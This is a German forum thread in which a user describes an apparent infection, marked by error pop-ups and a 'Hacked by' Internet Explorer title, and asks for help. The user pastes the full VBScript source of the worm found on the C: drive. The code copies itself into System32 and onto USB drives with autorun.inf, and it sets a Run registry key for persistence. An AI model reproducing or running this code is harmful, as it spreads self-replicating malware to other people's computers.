Also heute ist was passiert kA wann oder wie aber erst kamen Fehlermeldungen ich musste ganz oft auf Abbrechen klicken bis die weg gingen und die kommen oft wieder dann öffne ich den Internet Explorer und ober steht dann z.B. google.de und daneben dann immer Hacked by PRIVAT-BF0E3C6D also wahrscheinlich der Computername von jemanden und auf C ist plötzlich auch ne VBScript Datei wenn man die mit dem Editor öffnet steht das hier drin
Die Datei heißt wie der Computername, vielleicht weiß ja von euch einer was es ist ich hab ein paar Bilder hochgeladen auf denen man sieht was ich meine hoffe ihr könnt mir da weiter helfenCode:'Mutation of Trojan virus. 'My name is BIE.vbs On error resume next Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname Set fs = createobject("Scripting.FileSystemObject") Set wn = WScript.CreateObject("WScript.Network") Set mf = fs.getfile(Wscript.ScriptFullname) oldname=CStr(fs.getfilename(Wscript.ScriptFullname)) newname = wn.ComputerName & ".vbs" rgname = Replace(newname,".vbs","") atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe BIE.vbs" dim text,size size = mf.size check = mf.drive.drivetype Set text=mf.openastextstream(1,-2) do while not text.atendofstream mysource=mysource&text.readline mysource=mysource & vbcrlf Loop mysource=Replace(mysource,oldname,newname) do Set winpath = fs.getspecialfolder(0) Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname) tf.attributes = 32 Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true) tf.write mysource tf.close Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname) tf.attributes = 39 For each flashdrive in fs.drives If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" Then Set tf=fs.getfile(flashdrive.path &"\BIE.vbs") tf.attributes =32 Set tf=fs.createtextfile(flashdrive.path &"\BIE.vbs",2,true) tf.write mysource tf.close Set tf=fs.getfile(flashdrive.path &"\BIE.vbs") tf.attributes =39 Set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes = 32 Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true) tf.write atr tf.close Set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes=39 End If next Set rg = createobject("WScript.Shell") rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname, ".vbs","") if check <> 1 then Wscript.sleep 120000 End if loop while check<>1 Set sd = createobject("Wscript.shell") sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
Die Fehlermeldung:
Der Text im Internet Explorer:
Die VBScript Datei auf C:
Greetz KleverKing

Also heute ist was passiert kA wann oder wie aber erst kamen Fehlermeldungen ich musste ganz oft auf Abbrechen klicken bis die weg gingen und die kommen oft wieder dann öffne ich den Internet Explorer und ober steht dann z.B. google.de und daneben dann immer Hacked by PRIVAT-BF0E3C6D also wahrscheinlich der Computername von jemanden und auf C ist plötzlich auch ne VBScript Datei wenn man die mit dem Editor öffnet steht das hier drin 

*weiche-satan* .. wie kannst du bitte nur IE benutzen *entsetzt-sei* on topic: sieht aus wie standart maleware... ich denke aber das is noch leicht zu fixen... musst ned neu aufsetzen